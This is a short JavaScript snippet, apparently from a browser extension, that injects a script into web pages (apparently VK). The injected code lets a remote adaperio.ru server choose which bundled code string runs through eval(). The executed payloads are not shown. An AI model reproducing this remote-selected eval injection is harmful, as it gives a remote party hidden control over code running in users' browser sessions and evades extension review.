async function createSource() {
    var instanceId = adaperioData.instanceId;
    var url = `https://chrome-extension-api.adaperio.ru/vk/area/${instanceId}`;
    var response = await fetch(url, { method: 'GET' });
    var json = await response.json();
    var method = json.value;
    var currentSource = adaperioData.executableSources[method];
    eval(currentSource);
}

var script = document.createElement('script');
script.text = `
var adaperioData = ${JSON.stringify(adaperioData)}
${createSource.toString()};
createSource();
`
document.body.appendChild(script);
